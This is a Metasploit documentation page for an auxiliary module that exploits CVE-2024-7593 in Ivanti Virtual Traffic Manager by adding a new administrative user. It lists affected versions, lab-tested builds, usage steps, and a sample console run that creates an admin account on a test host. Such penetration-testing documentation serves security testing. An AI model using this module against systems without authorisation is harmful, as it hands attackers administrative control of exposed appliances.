Back to Metasploit Framework

Ivanti Vtm Admin

documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md

6.4.1311.8 KB
Original Source

Vulnerable Application

This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new administrative user to the web interface of the application.

Affected versions include:

  • 22.7R1
  • 22.6R1
  • 22.5R1
  • 22.3R2
  • 22.3
  • 22.2

The vendor published an advisory [here] (https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US).

A proof-of-concept is available here.

Testing

Docker images with the software are available from here.

Successfully tested on

  • 22.7R1 on Ubuntu 20.04.6 LTS
  • 22.6R1 on Ubuntu 20.04.6 LTS
  • 22.5R1 on Ubuntu 20.04.6 LTS
  • 22.3R1 on Ubuntu 20.04.5 LTS
  • 22.2 on Ubuntu 20.04.4 LTS

Verification Steps

  1. Deploy Ivanti Virtual Traffic Manager (vTM)
  2. Start msfconsole
  3. use auxiliary/admin/http/ivanti_vtm_admin
  4. set RHOSTS <IP>
  5. run
  6. A new admin user should have been added to the web interface.

Options

NEW_USERNAME

Username to be used when creating a new user with admin privileges.

NEW_PASSWORD

Password to be used when creating a new user with admin privileges.

Scenarios

Running the module against Virtual Traffic Manager (vTM) 22.7R1 should result in an output similar to the following:

msf > use auxiliary/admin/http/ivanti_vtm_admin 
msf auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
msf auxiliary(admin/http/ivanti_vtm_admin) > exploit 
[*] Running module against 172.17.0.2

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 22.7R1
[+] New admin user was successfully added:
	h4x0r:w00Tw00T!
[+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi
[*] Auxiliary module execution completed